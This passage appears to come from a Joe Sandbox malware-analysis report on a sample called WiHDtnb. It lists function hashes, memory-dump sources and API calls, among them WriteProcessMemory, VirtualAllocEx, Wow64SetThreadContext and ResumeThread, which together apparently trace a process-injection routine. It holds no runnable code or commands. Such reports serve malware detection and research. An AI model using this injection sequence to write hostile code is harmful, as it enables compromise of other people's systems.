                            • Opcode ID: 260df4a71fdbd84d0d6dc515fa51126bc61a376beb2142fa9a9a4f52949e552f
                            • Instruction ID: 7d439c861be967e5475d80be1e09d8fa9d523ce50e7977b1f472917f9a46878b
                            • Opcode Fuzzy Hash: 260df4a71fdbd84d0d6dc515fa51126bc61a376beb2142fa9a9a4f52949e552f
                            • Instruction Fuzzy Hash: 2B41F2B0C00619CBDB28DFA9C8847CDBBB1BF89308F20815AD418AB255DB756946CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1116 63274a8-63274fe 1119 6327500-632750c 1116->1119 1120 632750e-632754d WriteProcessMemory 1116->1120 1119->1120 1122 6327556-6327586 1120->1122 1123 632754f-6327555 1120->1123 1123->1122
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06327540
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 41a9006c7b01b96a4dac71b0d2bda7a056ff10a513f3212eeea9533075370122
                            • Instruction ID: a8454f9691fc81ef8943f5cd226da4060e50ccc8c0f9b681c4eafe56540ebb5c
                            • Opcode Fuzzy Hash: 41a9006c7b01b96a4dac71b0d2bda7a056ff10a513f3212eeea9533075370122
                            • Instruction Fuzzy Hash: 9C2148B5D003199FCB10DFA9C881BDEBBF5FF48310F108429E519A7240C7789944CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1127 63274b0-63274fe 1129 6327500-632750c 1127->1129 1130 632750e-632754d WriteProcessMemory 1127->1130 1129->1130 1132 6327556-6327586 1130->1132 1133 632754f-6327555 1130->1133 1133->1132
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06327540
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: b400fa893ff609fd64e59f7ce1dbc21ca82926e139cdcdd7388052ac0eae10be
                            • Instruction ID: 29349e5c27727cc0ea5f3cfad5b111d87520b75e75386c14ade8376868715697
                            • Opcode Fuzzy Hash: b400fa893ff609fd64e59f7ce1dbc21ca82926e139cdcdd7388052ac0eae10be
                            • Instruction Fuzzy Hash: CA2126B59003599FCB10DFAAC885BEEBBF5FF48310F10842AE919A7240C7789944CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1137 6327310-6327363 1140 6327373-63273a3 Wow64SetThreadContext 1137->1140 1141 6327365-6327371 1137->1141 1143 63273a5-63273ab 1140->1143 1144 63273ac-63273dc 1140->1144 1141->1140 1143->1144
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06327396
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: a002327557f262e21d3165bbe30f24cc388d55171a69fff77a4bd06eaf3ca10f
                            • Instruction ID: f527478fc0a6d2b7732f0f33e42e86b4a0e568abc0df0ca4a73dc1daabecc3f5
                            • Opcode Fuzzy Hash: a002327557f262e21d3165bbe30f24cc388d55171a69fff77a4bd06eaf3ca10f
                            • Instruction Fuzzy Hash: DB2128B5D002098FDB10DFAAC8857EEBBF4FF48314F548429D559A7240DB78A945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1148 6327599-632762d ReadProcessMemory 1152 6327636-6327666 1148->1152 1153 632762f-6327635 1148->1153 1153->1152
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06327620
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 28203bd7822aa1c558fed58aea3b1a32c7a9aa1bbf55eb3aec04d300c26fd75e
                            • Instruction ID: e34514ce0389b9aec18096d6dfef6cfc9f7c2f745244976e744173932985ed9b
                            • Opcode Fuzzy Hash: 28203bd7822aa1c558fed58aea3b1a32c7a9aa1bbf55eb3aec04d300c26fd75e
                            • Instruction Fuzzy Hash: 192139B5D003599FCB10DFAAC881AEEFBF5FF48310F54842AE559A7240C7389945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06327620
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: c96f2fdfdfd7070349a0f68eaa2fda764f475200ec158ce025e2d92eca947df7
                            • Instruction ID: 4cbf9ea568d4bbb2580e9a04182d5cf80270df11def5199b0729666b94d8ee14
                            • Opcode Fuzzy Hash: c96f2fdfdfd7070349a0f68eaa2fda764f475200ec158ce025e2d92eca947df7
                            • Instruction Fuzzy Hash: 2F2138B1C003599FCB10DFAAC880AEEFBF5FF48310F10842AE519A7240C738A944CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06327396
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 4701461660c2deab071261ffabe19ebd837578024ee09b168be0a40d934a9da2
                            • Instruction ID: d2c633ce118247a8552bd600985998eb342100ca02912203e61434570ab0ab88
                            • Opcode Fuzzy Hash: 4701461660c2deab071261ffabe19ebd837578024ee09b168be0a40d934a9da2
                            • Instruction Fuzzy Hash: 1A2125B1D002098FDB10DFAAC8857EEBBF4BF88310F10842AD559A7240CB78A945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0632745E
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: c2987d7a7f61a0306e83e1add604b7df364fbbe438a7d29c4ccb434fa7bb7cce
                            • Instruction ID: 4ac45a482698c2ad0f7ebe6bae5d37eee03e95b258b8927b5507951a3c353102
                            • Opcode Fuzzy Hash: c2987d7a7f61a0306e83e1add604b7df364fbbe438a7d29c4ccb434fa7bb7cce
                            • Instruction Fuzzy Hash: 1E1159768002099FCB10DFAAC845AEFBFF5FF48310F108419E559A7250CB39A545CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0632745E
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: db0eb043ad623048ddd0ecb392c918f5373786a66b3cbdf217b2f37274e9548f
                            • Instruction ID: 880785cf6b41b6bb7087c8a8c98fc17c89e3465732c5739c9a1d4fcf5ab992e8
                            • Opcode Fuzzy Hash: db0eb043ad623048ddd0ecb392c918f5373786a66b3cbdf217b2f37274e9548f
                            • Instruction Fuzzy Hash: 4C1126759002499FCB10DFAAC844AEEBFF5FF88324F108419E519A7250C779A944CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: a00ffcde97ec340fa94bf2d56632e0b8e2c258d8fbb4a972b20a81a225fea0ac
                            • Instruction ID: f23de8632ed6dfad8232fa28afbd37da57a907d9688e3eef2e99d40e2dcde898
                            • Opcode Fuzzy Hash: a00ffcde97ec340fa94bf2d56632e0b8e2c258d8fbb4a972b20a81a225fea0ac
                            • Instruction Fuzzy Hash: 271158B5D002498FCB10DFAAC8457EFFBF5EF89320F24841AD559A7240CB39A945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: d2713cb56522065ed6a9b4e6fd08fd4e65429ebc4f3fac2b1cfbbf52afdf11c9
                            • Instruction ID: 07df2beb3cb8b0b62ede3616851a6eb772a7ca1e084a178adae0fca6b63c0b17
                            • Opcode Fuzzy Hash: d2713cb56522065ed6a9b4e6fd08fd4e65429ebc4f3fac2b1cfbbf52afdf11c9
                            • Instruction Fuzzy Hash: EF1128B1D002498FDB10DFAAC9457AFFBF5EF89324F208419D519A7240CB79A944CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0632AD35
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 7d5c9e0f6c40a12ef2cfdcb34d141b190b8f7d3490a622995d7468054deefd08
                            • Instruction ID: f57014cb43c9920b32f863746d222989fb634806e00ac60a0eec44b4a5c834fb
                            • Opcode Fuzzy Hash: 7d5c9e0f6c40a12ef2cfdcb34d141b190b8f7d3490a622995d7468054deefd08
                            • Instruction Fuzzy Hash: 0B11F2B58003599FDB50DF9AC984BDEFBF8EB48720F10841AE918A7600C379A944CFE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0632AD35
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: fa0fdcb2b821d88b260e04fd13dcf2a05755c1c057af6e440f6177c4ce9751f8
                            • Instruction ID: b12215580207da109f01724f680965cb58bd7ebf5519f82352ebe97fe6432c60
                            • Opcode Fuzzy Hash: fa0fdcb2b821d88b260e04fd13dcf2a05755c1c057af6e440f6177c4ce9751f8
                            • Instruction Fuzzy Hash: 9D1103B5800349DFDB10DF9AC985BDEFBF8EB48320F10841AE958A7200C379A944CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID: A
                            • API String ID: 0-3554254475
                            • Opcode ID: 1bcc741df9b4ce0a95919de375ad4ba2a16ba5770d75c74efd4b114b7314f87c
                            • Instruction ID: 7d4ce8d544f9bac606e6c62193c11187e995ad28a5d318cbdd33755b0eae573b
                            • Opcode Fuzzy Hash: 1bcc741df9b4ce0a95919de375ad4ba2a16ba5770d75c74efd4b114b7314f87c
                            • Instruction Fuzzy Hash: DD316931A44508CBCB54CFA9D885BAAB7B2BB1432AF158167ED27DB292D774DC408B11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 604c9815d219d5c7256599e563244449f227fa71f89090ea8bfbd3b65b762fce
                            • Instruction ID: 84860b3efe1628f5997ec52de8d511755c799fb4860abb34e91a7bac36395651
                            • Opcode Fuzzy Hash: 604c9815d219d5c7256599e563244449f227fa71f89090ea8bfbd3b65b762fce
                            • Instruction Fuzzy Hash: 9D515C34F002099BDB44DFA9C852BBEBAB2FB84714F108526ED16E7385DB749D02CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a291f0517a2c21aea7234d56a3fc6d08a3ea691205e1a8a6207e309f798f0b42
                            • Instruction ID: 74fd1d32ad65adbded8b358f6c922a3a29e4e933e392710632be6e217bb584d2
                            • Opcode Fuzzy Hash: a291f0517a2c21aea7234d56a3fc6d08a3ea691205e1a8a6207e309f798f0b42
                            • Instruction Fuzzy Hash: EE419E75E002198FCB04CFA9C884AEEBBF2BB49315F14846AD81AF7345DB349A45CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2022172685.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_103d000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35eec355142c75f0e0244f7176f57cfad24bd7e429a63c85a752270065197ca6
                            • Instruction ID: e7e7e8818f6f503fe0d787545059da89a1a1f78b663276002274c708dbd2da2d
                            • Opcode Fuzzy Hash: 35eec355142c75f0e0244f7176f57cfad24bd7e429a63c85a752270065197ca6
                            • Instruction Fuzzy Hash: 6C31AD7554C380AFD703DF64D994755BFB5AF86214F1885EAD8858B2A3C33A880ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4ac11839d596f6f8932618334a7168391951724c239a9f8391898e9f43c711ea
                            • Instruction ID: fa20f82463f629c8e3894f6a21472da29f971efd040d010e736b3407174e6881
                            • Opcode Fuzzy Hash: 4ac11839d596f6f8932618334a7168391951724c239a9f8391898e9f43c711ea
                            • Instruction Fuzzy Hash: DE316B75E042198FCB40CFA9D884AEEBBF1FB49315F54846AE819F7305D734AA458F60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e69f8a40824a6f3c746d9b203b59655b2fc127769d31aa75d9a586c4e2bc763c
                            • Instruction ID: 3e316f10c21ddfd16208604f244e98dcde6031c35cec74c80a2396a0e50ec047
                            • Opcode Fuzzy Hash: e69f8a40824a6f3c746d9b203b59655b2fc127769d31aa75d9a586c4e2bc763c
                            • Instruction Fuzzy Hash: FA213732E043095BCB05EF69DC41DEE7B7AEFC6324B408466E805D7255DB34AD08CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4dd7409b500fa3a00948df6357c78c2cfff173a592171dd4820a8af181f9aa1e
                            • Instruction ID: 5e3bc38fcc6178ebd3be0002bb58cf45af2cdf8d5313fcbce01c315957eb23b0
                            • Opcode Fuzzy Hash: 4dd7409b500fa3a00948df6357c78c2cfff173a592171dd4820a8af181f9aa1e
                            • Instruction Fuzzy Hash: FB213B3474A309DFD7198A288854B2A3BE7BBC1720F19C465DC43CB295CE74CD01C742
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2022172685.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_103d000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ecbd9314ae26ba196d87f2f717a35ba8fa2dd6cded4f57f834060ca6e3e9bff9
                            • Instruction ID: c4ddf71684d3d02c6cf7da9a2ab33f05f60bf2e110da3cf3737429d174e35695
                            • Opcode Fuzzy Hash: ecbd9314ae26ba196d87f2f717a35ba8fa2dd6cded4f57f834060ca6e3e9bff9
                            • Instruction Fuzzy Hash: 3921D0754083809FD703CF64D990715BFB5FB86214F28C5EAD8858B2A3C33AD80ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2022172685.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_103d000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 585450631962347cb96df88da6401f6597e5f661ef20c8ffcaf733fdb80483b8
                            • Instruction ID: 5bc7c9ef045535043ce9e4adea59ce45fe21d4c6fc41da794a7ab5b661f0c07e
                            • Opcode Fuzzy Hash: 585450631962347cb96df88da6401f6597e5f661ef20c8ffcaf733fdb80483b8
                            • Instruction Fuzzy Hash: B8210775504204EFDB05DFA8D5C0B2ABFA9FBC4314F64C5ADD9894B252C33AD806CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2022172685.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_103d000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5cdcfb2c12eca588c2af06ba88fcaea006dcb1d51497c334a867411881be11d8
                            • Instruction ID: f5d68367e8bfc4d2feac9f42fc874816d48e76ef1a06868394afa2143b55e7db
                            • Opcode Fuzzy Hash: 5cdcfb2c12eca588c2af06ba88fcaea006dcb1d51497c334a867411881be11d8
                            • Instruction Fuzzy Hash: CB21F571504204EFDB05DF58D980B16BBA9FBC4314F60C5ADE9494B356C33AD446CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67e5eb24f62c3d84fbefbd52a161db0894345fc5252f99e760f91645d050a604
                            • Instruction ID: 0684c965f4339c79b979d05fdb4a0861ab8075a0cb4d128af8ff9d32c5485da0
                            • Opcode Fuzzy Hash: 67e5eb24f62c3d84fbefbd52a161db0894345fc5252f99e760f91645d050a604
                            • Instruction Fuzzy Hash: 1B113D329082546BD701EB2DD850AAA7FFADFC2324B04C0D7DC55CB166D638C849CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2c2a520d7a5e3f5b54fb8d7b885baf25348dc0900a7416b886d4ceaa20f0d37f
                            • Instruction ID: 1d674342bee0ed3b5f23af8ef7c55487d80788e2cadfe0febd669bc0d9b60397
                            • Opcode Fuzzy Hash: 2c2a520d7a5e3f5b54fb8d7b885baf25348dc0900a7416b886d4ceaa20f0d37f
                            • Instruction Fuzzy Hash: 7011E1B5B193889FCB06CB748C59A6E7FF9AF46200B1504EAEC45C7293ED349D099712
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 562c20d303455b0faed02a5c7bb06fdb9c4471d4192b91ea41f6f980552e5342
                            • Instruction ID: ca5d1fd922d6de2fce79469e559ef3d94e255dde9397a8c1e7f5b33bece20a98
                            • Opcode Fuzzy Hash: 562c20d303455b0faed02a5c7bb06fdb9c4471d4192b91ea41f6f980552e5342
                            • Instruction Fuzzy Hash: 0B2114B59043499FCB10CF9AD888BDEBFF4FB48320F10841AE919A7210D379A944CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 008f092cf60644fe4b16c53a0f48eef0e62a8544c98559deb4a97f4b068d57aa
                            • Instruction ID: ed75c993b77245dab1a34f9f9def37424b9bb13342e62b767e559a50adc6d33c
                            • Opcode Fuzzy Hash: 008f092cf60644fe4b16c53a0f48eef0e62a8544c98559deb4a97f4b068d57aa
                            • Instruction Fuzzy Hash: 9B21E4B59003599FCB20DF9AD984ADEBFF4FB48320F10841AE919A7210D379A945CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2022172685.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_103d000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                            • Instruction ID: d4cb1c202440770787368fac336243d491c45d12cac470de4e05674b151e654a
                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                            • Instruction Fuzzy Hash: A2119D75504280DFDB06CF54D5C4B15BFB1FB84314F24C6A9D9894B657C33AD84ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2021379807.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_d1d000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 46f8c965d6290955a6dd73c5c4e108e58249892801d7f7ff1612c9e60f0ebdf4
                            • Instruction ID: 8e42a797c599d72c8f4c1c74cf27850bf589f46367439ed386a23f1ce82d656e
                            • Opcode Fuzzy Hash: 46f8c965d6290955a6dd73c5c4e108e58249892801d7f7ff1612c9e60f0ebdf4
                            • Instruction Fuzzy Hash: 2F012B31004344BAE7208B5AED84BA7BF9DEF45320F1CC42AED490A296C739DCC0C671
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 109317e0db9d484bbffd5d5d33a8352c294d4929dbc8a4f2deb6db1c2bc38686
                            • Instruction ID: 393505c77524ae9a37e217e80ff904a83a84e5532cfd2934fefcd486f771408e
                            • Opcode Fuzzy Hash: 109317e0db9d484bbffd5d5d33a8352c294d4929dbc8a4f2deb6db1c2bc38686
                            • Instruction Fuzzy Hash: 82F096B6B002046FDB05DF59D845EAE7BBAEBD4360B04C1AAEC18D7215D634DE119F90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2021379807.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_d1d000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c88e1d566da2a299d4859ab6925528219d71307dcba49f8a17b21e7e93c184dc
                            • Instruction ID: 48a8abf99c9f85b5aa4ff3d7cbfc0234d0156c7c1fd3dbb27183e2e493b45063
                            • Opcode Fuzzy Hash: c88e1d566da2a299d4859ab6925528219d71307dcba49f8a17b21e7e93c184dc
                            • Instruction Fuzzy Hash: 54F06271404344AAE7208A1ADC84BA2FFA9EF95734F18C55AED484A296C3799C84CA75
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c2ff0b96fc70054baa6afbbe814618b1e5400433f16bcf19ad779244502ab190
                            • Instruction ID: c2b937be86a69d2b92a14294b5bce3c074eb8c49d022b9699121e9ad9e82d61a
                            • Opcode Fuzzy Hash: c2ff0b96fc70054baa6afbbe814618b1e5400433f16bcf19ad779244502ab190
                            • Instruction Fuzzy Hash: 5CF09A2200CBD129E302933CCD61B827E40AF53339F18079AD8E0850F2D709444AC62B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a37d418d0fc66729f82dc5b01489b78d2815269f73a359cd1b981dda0998174
                            • Instruction ID: 955b5718569e7b6ae26cff3936eec5c73a758e3a010542abce3e6ad5099524fd
                            • Opcode Fuzzy Hash: 0a37d418d0fc66729f82dc5b01489b78d2815269f73a359cd1b981dda0998174
                            • Instruction Fuzzy Hash: 19C08C3006520C8BC2052BA8E61F3287EA8A709217F800410FA2A820908E788410C612
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                            Joe Sandbox IDA Plugin
